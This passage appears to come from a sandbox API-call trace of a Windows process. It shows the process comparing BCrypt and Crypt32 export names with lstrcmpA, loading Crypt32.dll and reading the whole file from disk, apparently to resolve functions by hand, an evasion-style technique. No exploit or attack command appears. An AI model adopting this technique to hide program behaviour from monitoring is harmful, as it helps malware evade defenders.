(lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0239.764] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0240.002] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0240.003] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0240.003] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0240.003] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0240.003] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0240.003] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0240.003] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0240.003] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0240.003] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0240.003] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0240.004] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0240.005] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0240.006] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0240.008] GetProcessHeap () returned 0x550000 [0240.008] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d62010 | out: hHeap=0x550000) returned 1 [0240.008] GetProcessHeap () returned 0x550000 [0240.008] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x569030 [0240.009] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0240.021] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0240.021] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0240.021] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0240.021] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0240.025] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0240.025] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0240.025] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0240.025] GetProcessHeap () returned 0x550000 [0240.025] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1c30e0) returned 0x4123040 [0240.031] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0240.031] ReadFile (in: hFile=0x160, lpBuffer=0x4123040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4123040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0240.634] CloseHandle (hObject=0x160) returned 1 [0240.635] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0240.635] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0240.635] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0240.635] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0240.635] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0240.635] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0240.635] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0240.635] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0240.635] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0240.635] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0240.635] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0240.635] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0240.635] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0240.635] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0240.635] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0240.635] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0240.635] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0240.635] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0240.635] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0240.635] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0240.635] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0240.636] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0240.636] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0240.636] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0240.636] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0240.637] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0240.638] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0240.638] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.638] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0240.638] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0240.638] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.639] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.640] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.640] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0240.640] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0240.640] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0240.640] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0240.640] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0240.640] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0240.640] lstrcmpA 